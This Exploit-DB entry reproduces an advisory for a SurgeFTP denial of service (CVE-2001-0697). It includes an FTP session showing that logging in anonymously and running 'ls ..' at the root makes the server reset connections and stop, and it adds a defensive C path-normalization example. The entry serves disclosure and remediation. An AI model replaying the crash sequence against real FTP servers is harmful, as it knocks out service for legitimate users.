- 18 Dec 2022
- EDB-ID: 20659
- EDB Verified: Passed
- Author: THE STRUMPF NOIR SOCIETY
- Vulnerability type: DOS
- Platform: MULTIPLE
- CVE: CVE-2001-0697
- Publication date: 2001-03-01
Code:
source: https://www.securityfocus.com/bid/2442/info
SurgeFTP is an FTP server distributed and maintained by Netwin. It is configurable, easily maintained, and runs on both UNIX and Windows platforms.
A problem in SurgeFTP's handling of malformed client requests could allow a denial of service against legitimate users. A client can cause the server to cease functioning by logging in and requesting a listing of the root directory, then a listing of the directory above the root directory. Upon receiving the request, the FTP server resets connections and ceases operating.
A malicious user can therefore deny service to legitimate users by sending the request described above to the FTP server.
# ftp localhost
Connected to testbak
220 SurgeFTP testbak (Version 1.0b)
User (testbak:(none)): anonymous
331 Password required for anonymous.
Password:
230- Alias Real path Access
230- / /home read
230 User anonymous logged in.
200 Port command successful.
150 Opening ASCII mode data connection for file list. (/)
226 Transfer complete.
ftp> ls ..
200 Port command successful.
550 Opening ASCII mode data connection for file list. (/..)
-> ftp get:Connection reset by peer
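The advisory does not state the root cause inside SurgeFTP. As an added example (not SurgeFTP's code), this is one way an FTP server can normalize a LIST argument against its virtual root so that ".." at "/" produces a 550 reply instead of an unhandled path; `ftp_resolve` and its parameters are hypothetical names.

```c
#include <stdio.h>
#include <string.h>

/* Resolve a client path against the session's virtual cwd ("/" = alias root).
 * Returns 0 and a normalized absolute virtual path in out, or -1 when the
 * path climbs above "/" or does not fit; the caller then answers 550 and
 * keeps the control connection open. Hypothetical helper, not SurgeFTP code. */
int ftp_resolve(const char *cwd, const char *arg, char *out, size_t outsz)
{
    char buf[1024];
    size_t len = 0;                      /* 0 means "still at the root" */
    int n = (arg[0] == '/')
        ? snprintf(buf, sizeof buf, "%s", arg)          /* absolute */
        : snprintf(buf, sizeof buf, "%s/%s", cwd, arg); /* relative */
    if (n < 0 || (size_t)n >= sizeof buf || outsz < 2)
        return -1;                       /* too long: refuse, never truncate */
    for (char *p = buf; *p; ) {
        while (*p == '/') p++;           /* skip separators */
        size_t clen = strcspn(p, "/");   /* length of this component */
        if (clen == 0) break;
        if (clen == 2 && p[0] == '.' && p[1] == '.') {
            if (len == 0) return -1;     /* ".." at the root: reject */
            while (out[len - 1] != '/') len--;   /* drop last component */
            len--;                               /* and its leading '/' */
        } else if (!(clen == 1 && p[0] == '.')) {
            if (len + clen + 2 > outsz) return -1;
            out[len++] = '/';
            memcpy(out + len, p, clen);
            len += clen;
        }
        p += clen;
    }
    if (len == 0) out[len++] = '/';
    out[len] = '\0';
    return 0;
}

int main(void)
{
    /* Constructed inputs mirroring the session above: "ls" then "ls .." */
    const char *args[] = { ".", ".." };
    char path[256];
    for (int i = 0; i < 2; i++) {
        if (ftp_resolve("/", args[i], path, sizeof path) == 0)
            printf("150 Opening ASCII mode data connection for file list. (%s)\n", path);
        else
            printf("550 %s: path is outside the FTP root.\n", args[i]);
    }
    return 0;
}
```

Because the function works only on virtual paths, the mapping from alias to real path (here `/` to `/home`) happens after the check and never sees a component above the root.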
- Source: www.exploit-db.com